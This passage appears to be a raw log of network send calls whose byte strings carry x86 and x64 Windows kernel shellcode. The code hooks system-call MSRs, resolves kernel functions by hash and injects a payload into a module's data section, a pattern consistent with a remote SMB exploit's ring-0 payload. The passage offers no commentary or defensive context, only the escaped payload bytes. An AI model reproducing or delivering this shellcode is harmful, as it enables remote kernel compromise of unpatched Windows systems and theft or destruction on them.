\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 19, b\\'\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x03\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\xb0\\\\x00\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\xc0\\\\xf0\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x90\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\xf1\\\\xdf\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\xf0\\\\x01\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x00\\\\x02\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x001\\\\xc0@\\\\x90t\\\\x08\\\\xe8\\\\t\\\\x00\\\\x00\\\\x00\\\\xc2$\\\\x00\\\\xe8\\\\xa7\\\\x00\\\\x00\\\\x00\\\\xc3\\\\xe8\\\\x01\\\\x00\\\\x00\\\\x00\\\\xeb\\\\x90[\\\\xb9v\\\\x01\\\\x00\\\\x00\\\\x0f2\\\\xa3\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\x8dC\\\\x171\\\\xd2\\\\x0f0\\\\xc3\\\\xb9#\\\\x00\\\\x00\\\\x00j0\\\\x0f\\\\xa1\\\\x8e\\\\xd9\\\\x8e\\\\xc1d\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\xff5\\\\xfc\\\\xff\\\\xdf\\\\xff`\\\\x9cj#R\\\\x9cj\\\\x02\\\\x83\\\\xc2\\\\x08\\\\x9d\\\\x80L$\\\\x01\\\\x02j\\\\x1b\\\\xff5\\\\x04\\\\x03\\\\xdf\\\\xffj\\\\x00USVWd\\\\x8b\\\\x1d\\\\x1c\\\\x00\\\\x00\\\\x00j;\\\\x8b\\\\xb3$\\\\x01\\\\x00\\\\x00\\\\xff31\\\\xc0H\\\\x89\\\\x03\\\\x8bn(j\\\\x01\\\\x83\\\\xecH\\\\x81\\\\xed\\\\x9c\\\\x02\\\\x00\\\\x00\\\\xa1\\\\xfc\\\\xff\\\\xdf\\\\xff\\\\xb9v\\\\x01\\\\x00\\\\x001\\\\xd2\\\\x0f0\\\\xfb\\\\xe8\\\\x11\\\\x00\\\\x00\\\\x00\\\\xfad\\\\x8b\\\\r@\\\\x00\\\\x00\\\\x00\\\\x8ba\\\\x04\\\\x83\\\\xec(\\\\x9da\\\\xc3\\\\xe9\\\\xef\\\\x00\\\\x00\\\\x00\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f2H\\\\xbb\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xff\\\\x89S\\\\x04\\\\x89\\\\x03H\\\\x8d\\\\x05\\\\n\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xc2H\\\\xc1\\\\xea \\\\x0f0\\\\xc3\\\\x0f\\\\x01\\\\xf8eH\\\\x89$%\\\\x10\\\\x00\\\\x00\\\\x00eH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00PSQRVWUAPAQARASATAUAVAWj+e\\\\xff4%\\\\x10\\\\x00\\\\x00\\\\x00ASj3QL\\\\x89\\\\xd1H\\\\x83\\\\xec\\\\x08UH\\\\x81\\\\xecX\\\\x01\\\\x00\\\\x00H\\\\x8d\\\\xac$\\\\x80\\\\x00\\\\x00\\\\x00H\\\\x89\\\\x9d\\\\xc0\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xbd\\\\xc8\\\\x00\\\\x00\\\\x00H\\\\x89\\\\xb5\\\\xd0\\\\x00\\\\x00\\\\x00H\\\\xa1\\\\xf8\\\\x0f\\\\xd0\\\\xff\\\\xff\\\\xff\\\\xff\\\\xffH\\\\x89\\\\xc2H\\\\xc1\\\\xea H1\\\\xdb\\\\xff\\\\xcbH!\\\\xd8H1\\\\xc9\\\\xb9\\\\x82\\\\x00\\\\x00\\\\xc0\\\\x0f0\\\\xfb\\\\xe88\\\\x00\\\\x00\\\\x00\\\\xfaeH\\\\x8b$%\\\\xa8\\\\x01\\\\x00\\\\x00H\\\\x83\\\\xecxA_A^A]A\\\\\\\\A[AZAYAX]_^ZY[XeH\\\\x8b$%\\\\x10\\\\x00\\\\x00\\\\x00\\\\x0f\\\\x01\\\\xf8\\\\xff$%\\\\xf8\\\\x0f\\\\xd0\\\\xff1\\\\xc0@\\\\x90\\\\x0f\\\\x84\\\\xb5\\\\x05\\\\x00\\\\x00\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00X`\\\\x89\\\\xc3\\\\x89\\\\xe5\\\\x83\\\\xecHd\\\\x8b\\\\r8\\\\x00\\\\x00\\\\x00f\\\\x8bA\\\\x06\\\\xc1\\\\xe0\\\\x10f\\\\x8b\\\\x01f%\\\\x00\\\\xf0\\\\x8b\\\\x08f\\\\x81\\\\xf9MZt\\\\x07-\\\\x00\\\\x10\\\\x00\\\\x00\\\\xeb\\\\xf0\\\\x89E\\\\xfcS\\\\x89\\\\xc3\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8>\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf8\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe81\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\xb9.[Q\\\\xd2\\\\xe8$\\\\x01\\\\x00\\\\x00\\\\x89E\\\\xec[\\\\x8dU\\\\xe81\\\\xc9\\\\x89\\\\nRj\\\\x00Rj\\\\x0b\\\\xff\\\\xd0\\\\x8bU\\\\xe8\\\\x85\\\\xd2\\\\x0f\\\\x84\\\\x02\\\\x01\\\\x00\\\\x00Rj\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xf4\\\\x00\\\\x00\\\\x00Pj\\\\x00\\\\xffu\\\\xe8Pj\\\\x0b\\\\xffU\\\\xec\\\\x85\\\\xc0\\\\x0f\\\\x85\\\\xe0\\\\x00\\\\x00\\\\x00XP-\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x05\\\\x1c\\\\x01\\\\x00\\\\x00P\\\\xe8\\\\x80\\\\x01\\\\x00\\\\x00\\\\xb9\\\\xfa<\\\\xad\\\\xc29\\\\xc8t\\\\x1e\\\\xb9\\\\x1a\\\\xbdK+9\\\\xc8t\\\\x15X\\\\x8bU\\\\xe8\\\\x81\\\\xea\\\\x1c\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c\\\\xac\\\\x00\\\\x00\\\\x00\\\\x89U\\\\xe8\\\\xeb\\\\xceX\\\\x8bp\\\\xec\\\\xffU\\\\xf4\\\\x89\\\\xf0PPh.datja\\\\xe8\\\\\\'\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x88\\\\x00\\\\x00\\\\x00X\\\\x83\\\\xe9@\\\\xe8Z\\\\x02\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x15\\\\x8b\\\\x16\\\\xc1\\\\xea\\\\x18\\\\x89\\\\xf0\\\\xc1\\\\xe8\\\\x189\\\\xd0u\\\\x07\\\\x8bFH\\\\x85\\\\xc0t\\\\n\\\\x83\\\\xc6\\\\x04\\\\x83\\\\xe9\\\\x04\\\\xe3^\\\\xeb\\\\xd8\\\\x89u\\\\xf0Vh\\\\xf8\\\\x0f\\\\x00\\\\x00j\\\\x00\\\\xffU\\\\xf8\\\\x85\\\\xc0tJP\\\\x89\\\\xc71\\\\xc0\\\\x89\\\\xc1f\\\\x81\\\\xc1\\\\x00\\\\x04\\\\xf3\\\\xabX\\\\x89\\\\x00\\\\x8bU\\\\x04\\\\x89P\\\\x041\\\\xd7\\\\x8bU\\\\xf8\\\\x89P\\\\x081\\\\xd7\\\\x8bU\\\\xf4\\\\x89P\\\\x0c1\\\\xd7\\\\x8bU\\\\xf0\\\\x89P\\\\x101\\\\xd7\\\\x89x$\\\\x83\\\\xc0H\\\\x89\\\\xc7\\\\x8d\\\\xb3\\\\x96\\\\x03\\\\x00\\\\x00\\\\xb9\\\\x1a\\\\x02\\\\x00\\\\x00\\\\xf3\\\\xa4[\\\\x89C8\\\\x89\\\\xeca\\\\xc3SRQWU\\\\x89\\\\xe5\\\\x83\\\\xec\\\\x18\\\\x89\\\\xcf\\\\x89\\\\xd8\\\\x89E\\\\xfc\\\\xe8z\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0tm\\\\x89E\\\\xf8\\\\xe8\\\\xee\\\\x00\\\\x00\\\\x00\\\\x89E\\\\xf4\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x0e\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tS\\\\x89E\\\\xf0\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\x04\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0tA\\\\x89E\\\\xec\\\\x8bE\\\\xfc\\\\x8bM\\\\xf8\\\\xe8\\\\xfa\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t/\\\\x89E\\\\xe8\\\\x8bE\\\\xfc\\\\x89\\\\xf9\\\\x8bU\\\\xec\\\\x8b]\\\\xf4\\\\xe8\\\\xab\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t\\\\x18\\\\x89\\\\xc1\\\\x8bE\\\\xe8\\\\xe8\\\\xdd\\\\x00\\\\x00\\\\x00f\\\\x89\\\\xc2\\\\x8bE\\\\xfc\\\\x8bM\\\\xf0\\\\xe8\\\\xd7\\\\x00\\\\x00\\\\x00\\\\x83\\\\xc4\\\\x18]_YZ[\\\\xc3V\\\\x89\\\\xc6\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc6f\\\\x81>PEu\\\\t\\\\x83\\\\xc6x\\\\x8b6\\\\x01\\\\xf0^\\\\xc31\\\\xc0\\\\xeb\\\\xfaVQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\x05\\\\x01\\\\xc8F\\\\xeb\\\\xe9_Y^\\\\xc3VWR\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xd2\\\\x8a\\\\x16\\\\x01\\\\xd0F\\\\xe2\\\\xeeZ_^\\\\xc3VQW\\\\x89\\\\xc61\\\\xc0\\\\x89\\\\xc7\\\\xc1\\\\xe7\\\\x07)\\\\xc7\\\\x89\\\\xf81\\\\xc9\\\\x8a\\\\x0e\\\\x80\\\\xf9\\\\x00t\\\\xc6\\\\x01\\\\xc8FF\\\\xeb\\\\xe8_Y^\\\\xc3\\\\x83\\\\xc0\\\\x18\\\\x8b\\\\x00\\\\xc3WVQ1\\\\xff\\\\x89\\\\xc69\\\\xdft\\\\x19\\\\x8b\\\\x04\\\\xba\\\\x01\\\\xf0\\\\xe8\\\\x83\\\\xff\\\\xff\\\\xff9\\\\xc8t\\\\x07G\\\\xeb\\\\xebY^_\\\\xc3\\\\x89\\\\xf8\\\\xeb\\\\xf81\\\\xc0\\\\xeb\\\\xf4\\\\x83\\\\xc1\\\\x1c\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1 \\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\x83\\\\xc1$\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3\\\\xd1\\\\xe1\\\\x01\\\\xc8f\\\\x8b\\\\x00\\\\xc3\\\\x81\\\\xe2\\\\xff\\\\xff\\\\x00\\\\x00\\\\xc1\\\\xe2\\\\x02\\\\x01\\\\xd1\\\\x8b\\\\t\\\\x01\\\\xc8\\\\xc3RV\\\\x8bt$\\\\x0c\\\\x8bL$\\\\x101\\\\xd2\\\\xd1\\\\xe9\\\\x85\\\\xc9t\\\\x0c\\\\xc1\\\\xc2\\\\x05\\\\xacF\\\\x0c 0\\\\xc2I\\\\xeb\\\\xf0\\\\x89\\\\xd0^Z\\\\xc2\\\\x08\\\\x00XZ_^PV\\\\x89\\\\xf0\\\\x83\\\\xc6<\\\\x8b6\\\\x01\\\\xc61\\\\xc0\\\\x89\\\\xc1f\\\\x8bN\\\\x06f\\\\x8bF\\\\x14\\\\x01\\\\xc6\\\\x83\\\\xc6\\\\x18\\\\x85\\\\xc9t\\\\x1d\\\\x8b\\\\x069\\\\xf8u\\\\x07\\\\x8bF\\\\x049\\\\xd0t\\\\x06\\\\x83\\\\xc6(I\\\\xeb\\\\xe9\\\\x8bF\\\\x0c\\\\x8bN\\\\x08^\\\\x01\\\\xc6\\\\xc31\\\\xf6\\\\xc3`1\\\\xc0\\\\x83\\\\xf8\\\\x0ft\\\\x1e1\\\\xc9\\\\x8b<\\\\x86\\\\x8b\\\\x14\\\\x8e9\\\\xd7t\\\\x03Au\\\\xf3\\\\x0f\\\\xb6\\\\x94\\\\x03\\\\x87\\\\x03\\\\x00\\\\x009\\\\xd1u\\\\r@\\\\xeb\\\\xddA9\\\\xc8u\\\\x05a1\\\\xc0@\\\\xc3a1\\\\xc0\\\\xc3\\\\x00\\\\x01\\\\x02\\\\x03\\\\x04\\\\x05\\\\x06\\\\x07\\\\x08\\\\t\\\\n\\\\t\\\\t\\\\r\\\\x0e\\\\x8bL$\\\\x08`\\\\xe8\\\\x00\\\\x00\\\\x00\\\\x00]f\\\\x81\\\\xe5\\\\x00\\\\xf0\\\\x89M4\\\\xe8\\\\xd9\\\\x01\\\\x00\\\\x00\\\\xe8C\\\\x01\\\\x00\\\\x00\\\\xe8\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xe3\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bK\\\\xd8\\\\xe8\\\\x17\\\\x01\\\\x00\\\\x00<#t\\\\r<wt\\\\x1c<\\\\xc8t\"\\\\xe9\\\\xb6\\\\x00\\\\x00\\\\x00\\\\x8bM8\\\\x8bE$\\\\x89A\\\\x0e1\\\\xc0\\\\x88A\\\\x12\\\\xe9\\\\x9f\\\\x00\\\\x00\\\\x00\\\\xe8\\\\x13\\\\x01\\\\x00\\\\x00\\\\xe9\\\\xb5\\\\x00\\\\x00\\\\x00\\\\x8b]<\\\\x8bC\\\\xe8\\\\x8b03u(\\\\x8bx\\\\x083}(\\\\x8b@\\\\x043E(;C\\\\x10\\\\x89\\\\xc3u{\\\\x8bM09\\\\xf1\\\\x8bE,t\\\\x18\\\\xe8\\\\xf2\\\\x00\\\\x00\\\\x00\\\\x8dF\\\\x04Pj\\\\x00\\\\xffU\\\\x08\\\\x85\\\\xc0tc\\\\x89E,\\\\x89u0\\\\x01\\\\xdf9\\\\xf7wS)\\\\xdf\\\\x01\\\\xc7W\\\\x89\\\\xf2\\\\x8bu<\\\\x8bv\\\\xf0\\\\x89\\\\xd9\\\\xf3\\\\xa4^\\\\x89\\\\xd9\\\\xc1\\\\xe9\\\\x02\\\\x8b](1\\\\x1e\\\\x83\\\\xc6\\\\x04\\\\xe2\\\\xf9\\\\x01\\\\xd09\\\\xc6|(\\\\x8bE,`\\\\x89\\\\xe6P\\\\xff\\\\xd0\\\\x89\\\\xf4a\\\\xe8\\\\xa1\\\\x00\\\\x00\\\\x00\\\\x8bE$\\\\xd1\\\\xe81\\\\xc9\\\\x88\\\\xc1\\\\x01\\\\xe9\\\\x8b\\\\t1\\\\xc8\\\\x89E$\\\\xe8h\\\\x00\\\\x00\\\\x00\\\\xb0\\\\x10\\\\xeb\\\\x08\\\\xb0 \\\\xeb\\\\x04\\\\xb00\\\\xeb\\\\x00\\\\x8bM8\\\\xb4\\\\x00f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1ca\\\\xff`<\\\\x8dEH\\\\x8bM\\\\x0c\\\\x89\\\\x88G\\\\x01\\\\x00\\\\x00\\\\x89\\\\xa8>\\\\x01\\\\x00\\\\x00f\\\\xb8\\\\x10\\\\x00\\\\x8bM8f\\\\x01A\\\\x1e\\\\x8bE\\\\x10\\\\x89D$\\\\x1cah\\\\x00\\\\x00\\\\x00\\\\x00\\\\x8b@<Ph\\\\x00\\\\x00\\\\x00\\\\x00\\\\xc31\\\\xc0\\\\x88\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc1\\\\xe9\\\\x08\\\\x00\\\\xc8\\\\xc3Q\\\\x8bE$\\\\x89\\\\xc1\\\\x0f\\\\xc9\\\\xd1\\\\xe01\\\\xc8\\\\x89E(Y\\\\xc3`\\\\xe8\\\\x0b\\\\x00\\\\x00\\\\x00\\\\x8bE\\\\x10\\\\x8bH<\\\\x89H8a\\\\xc3`\\\\x8b],\\\\x85\\\\xdbt\\\\r1\\\\xc0\\\\x89\\\\xdf\\\\x8bM0\\\\xf3\\\\xaaS\\\\xffU\\\\x0c1\\\\xc0\\\\x89E0\\\\x89E,a\\\\xc3WRV\\\\x89\\\\xcf\\\\x8bUD\\\\x8b\\\\n\\\\xe89\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0u\\\\x0e\\\\x83\\\\xc2\\\\x08\\\\x8b\\\\n\\\\xe8+\\\\x00\\\\x00\\\\x00\\\\x85\\\\xc0t!\\\\x89MDj\\\\x0cX\\\\x8dqT;\\\\x06t\\\\x07\\\\x83\\\\xc6\\\\x04;\\\\x06u\\\\r;F\\\\x04u\\\\x08\\\\x89u<1\\\\xc0@\\\\xeb\\\\x021\\\\xc0^Z_\\\\xc31\\\\xc09\\\\xc1}\\\\x01@\\\\xc3RQ1\\\\xd2f\\\\x8bQ\\\\x02\\\\x01\\\\xca;\\\\x11t\\\\x05\\\\x83\\\\xc1\\\\x04\\\\xeb\\\\xf7Z\\\\x8dA\\\\x1c\\\\x83\\\\xc0\\\\x07$\\\\xf8\\\\x89ED\\\\x8bA\\\\xf8\\\\x89E8\\\\x89\\\\xd1Z\\\\xc3SUWVATAUAVAWH\\\\x89\\\\xe5H\\\\x81\\\\xec\\\\x80\\\\x00\\\\x00\\\\x00f\\\\x83\\\\xe4\\\\xf0\\\\xe8\\\\x83\\\\x03\\\\x00\\\\x00H\\\\x89E\\\\xf8H\\\\x89\\\\xc3\\\\xb9.[Q\\\\xd2\\\\xe8\\\\xee\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xd5\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc6\\\\xb9\\\\x94\\\\x01i\\\\xe3\\\\xe8\\\\xd8\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xbf\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xf0H\\\\x89\\\\xc7\\\\xb9\\\\x85T\\\\x83\\\\xf0\\\\xe8\\\\xbe\\\\x01\\\\x00\\\\x00H\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\xa5\\\\x01\\\\x00\\\\x00H\\\\x89E\\\\xe8L\\\\x8dM\\\\xd0M1\\\\xc0L\\\\x89\\\\xc1D\\\\x89E\\\\xd0L\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6D\\\\x8bE\\\\xd0E\\\\x85\\\\xc0\\\\x0f\\\\x84\\\\x7f\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0H1\\\\xc9\\\\xff\\\\xd7H\\\\x85\\\\xc0\\\\x0f\\\\x84n\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xc3H1\\\\xc9I\\\\x89\\\\xc9D\\\\x8bE\\\\xd0H\\\\x89\\\\xc2\\\\xb1\\\\x0b\\\\xff\\\\xd6H\\\\x85\\\\xc0\\\\x0f\\\\x85Q\\\\x01\\\\x00\\\\x00H\\\\x89\\\\xd8H-\\\\xf8\\\\x00\\\\x00\\\\x00H\\\\x05(\\\\x01\\\\x00\\\\x00\\\\x8bU\\\\xd0\\\\x81\\\\xea(\\\\x01\\\\x00\\\\x00\\\\x0f\\\\x8c3\\\\x01\\\\x00\\\\x00\\\\x89U\\\\xd0P\\\\xe8?\\\\x02\\\\x00\\\\x00H\\\\x89\\\\xc2X\\\\xb9\\\\xfa<\\\\xad\\\\xc2H9\\\\xcat\\\\n\\\\xb9\\\\x1a\\\\xbdK+H9\\\\xcau\\\\xcaH\\\\x8bp\\\\xe8H\\\\x89\\\\xd9\\\\xffU\\\\xe8H\\\\x89\\\\xf0H1\\\\xd2H\\\\x89\\\\xc3\\\\x8bP<H\\\\x01\\\\xd0H\\\\x89\\\\xc6H1\\\\xc9H\\\\x89\\\\xcaf\\\\x8bH\\\\x06f\\\\x8bP\\\\x14H\\\\x01\\\\xd6H\\\\x83\\\\xc6\\\\x18H\\\\xbf.data\\\\x00\\\\x00\\\\x00H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x84\\\\xcd\\\\x00\\\\x00\\\\x00H\\\\x8b\\\\x06H9\\\\xf8t\\\\tH\\\\x83\\\\xc6(H\\\\xff\\\\xc9\\\\xeb\\\\xe5\\\\x8bF\\\\x0c\\\\x8bN\\\\x08H\\\\x01\\\\xc6H\\\\xbb\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfe\\\\xfeH\\\\x83\\\\xe9\\\\x08H\\\\x83\\\\xf9\\\\x00\\\\x0f\\\\x8c\\\\x9b\\\\x00\\\\x00\\\\x00H\\\\x8b>H9\\\\xdfu\\\\x0cL\\\\x8b\\\\x86\\\\x98\\\\x00\\\\x00\\\\x00M\\\\x85\\\\xc0t\\\\x06H\\\\x83\\\\xc6\\\\x08\\\\xeb\\\\xd8H\\\\x83\\\\xc6\\\\x08H\\\\x89u\\\\xe0H1\\\\xc9\\\\xba\\\\xf0\\\\x0f\\\\x00\\\\x00\\\\xffU\\\\xf0H\\\\x85\\\\xc0tiI\\\\x89\\\\xc1H1\\\\xc0\\\\xb9\\\\x00\\\\x04\\\\x00\\\\x00L\\\\x89\\\\xcf\\\\xf3\\\\xabL\\\\x89\\\\xcfH\\\\x83\\\\xc7`H\\\\x8d5\\\\x91\\\\x02\\\\x00\\\\x00H1\\\\xc9f\\\\xb96\\\\x02\\\\xf3\\\\xa4M\\\\x89\\\\tH\\\\x8b]\\\\xf8I\\\\x89Y\\\\x08H1\\\\xdfH\\\\x8b]\\\\xf0I\\\\x89Y\\\\x10H1\\\\xdfH\\\\x8b]\\\\xe8I\\\\x89Y\\\\x18H1\\\\xdfH\\\\x8b]\\\\xe0I\\\\x89Y H1\\\\xdfA\\\\x89yDH\\\\x8bE\\\\xe0H\\\\x83\\\\xc0pI\\\\x83\\\\xc1`L\\\\x89\\\\x08H\\', 0.0)', '(\\'send\\', 20, 